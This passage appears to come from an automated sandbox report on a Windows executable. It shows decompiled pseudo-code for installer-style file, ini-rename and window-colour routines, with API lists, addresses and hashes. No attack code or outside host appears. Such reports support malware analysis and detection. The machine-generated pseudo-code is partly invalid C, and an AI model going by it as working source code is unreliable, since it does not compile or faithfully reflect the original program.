                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                  • String ID: (gD$A$ExecToStack$start OK
                                                                                                                                                                                                  • API String ID: 2624150263-3519445815
                                                                                                                                                                                                  • Opcode ID: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                  • Instruction ID: 9143468ab5d07659f3e28480ae0608f723924ccc95e3ca23e4c22bb38621839a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50A161B1900205ABDB11AFA6CD85AAF77B8EF84315F11803BF601B62D1D77C99418F6D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00406034(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x45edc8 = 0x55004e;
				 *0x45edcc = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x45f5c8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x45e9c8, "%ls=%ls\r\n", 0x45edc8, 0x45f5c8);
						_t53 = _t52 + 0x10;
						E0040640A(_t37, 0x400, 0x45f5c8, 0x45f5c8,  *((intOrPtr*)( *0x470254 + 0x128)));
						_t12 = E00405EDE(0x45f5c8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405F61(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405E43(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405E43(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405E99(_t24 + _t46, 0x45e9c8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405F90(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405EDE(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x45edc8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                                                                                  0x00406034
                                                                                                                                                                                                  0x0040603d
                                                                                                                                                                                                  0x00406044
                                                                                                                                                                                                  0x0040604e
                                                                                                                                                                                                  0x00406062
                                                                                                                                                                                                  0x0040608a
                                                                                                                                                                                                  0x00406095
                                                                                                                                                                                                  0x00406099
                                                                                                                                                                                                  0x004060b9
                                                                                                                                                                                                  0x004060c0
                                                                                                                                                                                                  0x004060ca
                                                                                                                                                                                                  0x004060d7
                                                                                                                                                                                                  0x004060dc
                                                                                                                                                                                                  0x004060e1
                                                                                                                                                                                                  0x004060e5
                                                                                                                                                                                                  0x004060f4
                                                                                                                                                                                                  0x004060f6
                                                                                                                                                                                                  0x00406103
                                                                                                                                                                                                  0x00406107
                                                                                                                                                                                                  0x004061a2
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040611d
                                                                                                                                                                                                  0x0040612a
                                                                                                                                                                                                  0x0040614e
                                                                                                                                                                                                  0x00406152
                                                                                                                                                                                                  0x00406171
                                                                                                                                                                                                  0x00406175
                                                                                                                                                                                                  0x00406175
                                                                                                                                                                                                  0x00406177
                                                                                                                                                                                                  0x00406180
                                                                                                                                                                                                  0x0040618b
                                                                                                                                                                                                  0x00406196
                                                                                                                                                                                                  0x0040619c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040619c
                                                                                                                                                                                                  0x00406154
                                                                                                                                                                                                  0x00406157
                                                                                                                                                                                                  0x00406162
                                                                                                                                                                                                  0x0040615e
                                                                                                                                                                                                  0x00406160
                                                                                                                                                                                                  0x00406161
                                                                                                                                                                                                  0x00406161
                                                                                                                                                                                                  0x00406169
                                                                                                                                                                                                  0x0040616b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040616b
                                                                                                                                                                                                  0x00406135
                                                                                                                                                                                                  0x0040613b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040613b
                                                                                                                                                                                                  0x00406107
                                                                                                                                                                                                  0x004060e5
                                                                                                                                                                                                  0x00406064
                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                  0x00406078
                                                                                                                                                                                                  0x0040607c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040607c
                                                                                                                                                                                                  0x004061ad

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32 ref: 00406078
                                                                                                                                                                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32 ref: 00406095
                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0045F5C8,C0000000,00000004,0045F5C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,0045E9C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 0040619C
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                    • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                                                                                  • Opcode ID: fe35cf331e914c5aa3c4a02719cbd37dbb3514f33eb3a0b2b183894161a2601e
                                                                                                                                                                                                  • Instruction ID: a59dba961965db3d83d90a372a5cb94a2ead5b1f2218518f4427fddb9e4ed3d0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe35cf331e914c5aa3c4a02719cbd37dbb3514f33eb3a0b2b183894161a2601e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F312771200705BBE2206B628D48F573A6CEF45745F15043EFA46FA2C3DA7CD91586AD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E004043C6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                                                                                  0x004043d8
                                                                                                                                                                                                  0x0040448e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040448e
                                                                                                                                                                                                  0x004043e9
                                                                                                                                                                                                  0x004043ed
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404407
                                                                                                                                                                                                  0x00404407
                                                                                                                                                                                                  0x00404410
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404412
                                                                                                                                                                                                  0x0040441e
                                                                                                                                                                                                  0x00404421
                                                                                                                                                                                                  0x00404421
                                                                                                                                                                                                  0x00404427
                                                                                                                                                                                                  0x0040442d
                                                                                                                                                                                                  0x0040442d
                                                                                                                                                                                                  0x00404439
                                                                                                                                                                                                  0x0040443f
                                                                                                                                                                                                  0x00404446
                                                                                                                                                                                                  0x00404449
                                                                                                                                                                                                  0x0040444c
                                                                                                                                                                                                  0x0040444e
                                                                                                                                                                                                  0x0040444e
                                                                                                                                                                                                  0x00404456
                                                                                                                                                                                                  0x0040445c
                                                                                                                                                                                                  0x0040445c
                                                                                                                                                                                                  0x00404466
                                                                                                                                                                                                  0x0040446b
                                                                                                                                                                                                  0x0040446e
                                                                                                                                                                                                  0x00404473
                                                                                                                                                                                                  0x00404476
                                                                                                                                                                                                  0x00404476
                                                                                                                                                                                                  0x00404486
                                                                                                                                                                                                  0x00404486
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404489

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                  • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                                  			E0040264A(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C1F(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x4702e8 =  *0x4702e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x1fff;
					if(__eax > 0x1fff) {
						 *(__ebp - 0x3c) = 0x1fff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E00406348(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405FBF( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405F61( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E0040632F( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1) = __ebp - 0x44;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                                                                                                  0x0040264a
                                                                                                                                                                                                  0x0040264c
                                                                                                                                                                                                  0x0040264f
                                                                                                                                                                                                  0x00402651
                                                                                                                                                                                                  0x00402654
                                                                                                                                                                                                  0x00402659
                                                                                                                                                                                                  0x0040265d
                                                                                                                                                                                                  0x00402660
                                                                                                                                                                                                  0x00402663
                                                                                                                                                                                                  0x00402ac5
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402669
                                                                                                                                                                                                  0x00402669
                                                                                                                                                                                                  0x00402670
                                                                                                                                                                                                  0x00402672
                                                                                                                                                                                                  0x00402672
                                                                                                                                                                                                  0x00402678
                                                                                                                                                                                                  0x004027dc
                                                                                                                                                                                                  0x004027dc
                                                                                                                                                                                                  0x004027df
                                                                                                                                                                                                  0x004027e4
                                                                                                                                                                                                  0x004015b6
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040267e
                                                                                                                                                                                                  0x0040267f
                                                                                                                                                                                                  0x0040268a
                                                                                                                                                                                                  0x0040268d
                                                                                                                                                                                                  0x00402699
                                                                                                                                                                                                  0x0040269d
                                                                                                                                                                                                  0x00402735
                                                                                                                                                                                                  0x0040274d
                                                                                                                                                                                                  0x0040275d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004026a3
                                                                                                                                                                                                  0x004026a3
                                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                                  0x004026a7
                                                                                                                                                                                                  0x004026aa
                                                                                                                                                                                                  0x004026af
                                                                                                                                                                                                  0x004026b6
                                                                                                                                                                                                  0x004026be
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004026c4
                                                                                                                                                                                                  0x004026c4
                                                                                                                                                                                                  0x004026c9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004026cf
                                                                                                                                                                                                  0x004026cf
                                                                                                                                                                                                  0x004026d7
                                                                                                                                                                                                  0x004026da
                                                                                                                                                                                                  0x004026dd
                                                                                                                                                                                                  0x00402798
                                                                                                                                                                                                  0x0040279f
                                                                                                                                                                                                  0x004026e3
                                                                                                                                                                                                  0x004026e9
                                                                                                                                                                                                  0x004026f5
                                                                                                                                                                                                  0x0040275f
                                                                                                                                                                                                  0x0040275f
                                                                                                                                                                                                  0x004026f7
                                                                                                                                                                                                  0x004026f7
                                                                                                                                                                                                  0x004026fa
                                                                                                                                                                                                  0x004026fc
                                                                                                                                                                                                  0x004026fc
                                                                                                                                                                                                  0x004026fc
                                                                                                                                                                                                  0x004026ff
                                                                                                                                                                                                  0x00402704
                                                                                                                                                                                                  0x00402707
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402709
                                                                                                                                                                                                  0x0040270c
                                                                                                                                                                                                  0x0040271a
                                                                                                                                                                                                  0x00402720
                                                                                                                                                                                                  0x0040272e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402730
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402730
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040272e
                                                                                                                                                                                                  0x004026fc
                                                                                                                                                                                                  0x00402762
                                                                                                                                                                                                  0x00402765
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402767
                                                                                                                                                                                                  0x0040276c
                                                                                                                                                                                                  0x004027ad
                                                                                                                                                                                                  0x004027cf
                                                                                                                                                                                                  0x004027d6
                                                                                                                                                                                                  0x004027bb
                                                                                                                                                                                                  0x004027bb
                                                                                                                                                                                                  0x004027be
                                                                                                                                                                                                  0x004027c1
                                                                                                                                                                                                  0x004027c4
                                                                                                                                                                                                  0x004027c4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402775
                                                                                                                                                                                                  0x00402775
                                                                                                                                                                                                  0x00402778
                                                                                                                                                                                                  0x0040277b
                                                                                                                                                                                                  0x00402781
                                                                                                                                                                                                  0x00402785
                                                                                                                                                                                                  0x00402788
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402788
                                                                                                                                                                                                  0x0040276c
                                                                                                                                                                                                  0x00402765
                                                                                                                                                                                                  0x004026dd
                                                                                                                                                                                                  0x004026c9
                                                                                                                                                                                                  0x004026be
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040278a
                                                                                                                                                                                                  0x0040278a
                                                                                                                                                                                                  0x0040278d
                                                                                                                                                                                                  0x00402796
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040268d
                                                                                                                                                                                                  0x00402678
                                                                                                                                                                                                  0x00402ace
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                    • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                  • String ID: 9
                                                                                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                                                                                  • Opcode ID: e21ce50e3bc186423d5f263590ea0ce87cda2b105fdcc84cfa68da8edc0d4225
                                                                                                                                                                                                  • Instruction ID: eb16fdd1ee542fe42bbdfa0ebba740301294627c6441dfc4cb46f4c2e9c1cdcc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e21ce50e3bc186423d5f263590ea0ce87cda2b105fdcc84cfa68da8edc0d4225
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF511A75D00219AEDF21DF95DA88AAEB775FF04304F50443BE905B72D0DBB89982CB18
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00405450(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x468224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x470314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040640A(_t38, 0, 0x43e708, 0x43e708, _a4);
					}
					_t27 = lstrlenW(0x43e708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x468208, 0x43e708);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x43e708;
